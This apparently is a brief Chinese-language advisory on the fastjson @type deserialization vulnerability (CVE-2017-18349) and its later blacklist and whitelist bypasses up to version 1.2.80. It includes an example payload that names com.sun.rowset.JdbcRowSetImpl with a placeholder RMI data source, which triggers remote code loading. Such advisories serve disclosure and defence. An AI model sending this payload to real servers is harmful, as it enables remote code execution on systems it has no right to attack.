漏洞描述
fastjson 在 json 对象的 @type 字段的处理上存在一些问题,当用户提交一个精心构造的恶意的序列化数据到服务器端时,可能导致远程任意代码执行漏洞。
payload 示例
```json
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://url",
"autoCommit": true
}
```
CVE-2017-18349 为该漏洞第一次出现时候的编号,后续 fastjson 还有多次版本发布来解决黑名单、白名单绕过等问题。
绝大多数情况下,漏洞依赖于 fastjson 开启了 autotype 特性,此时,fastjson 将使用黑名单模式,命中黑名单的类将无法进行反序列化,提示 autoType is not support。但是 fastjson 的黑名单绕过比较多,可能存在一些安全风险。
如果没有开启 autotype,fastjson 将使用白名单模式,此白名单是代码中硬编码以及可以自己添加的,但是偶尔也有被发现白名单中的类也存在安全风险的,比如在 1.2.47 和 1.2.67 中修复的安全漏洞都是和白名单相关。
经研究在版本 <= 1.2.80 该利用在特定条件下可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。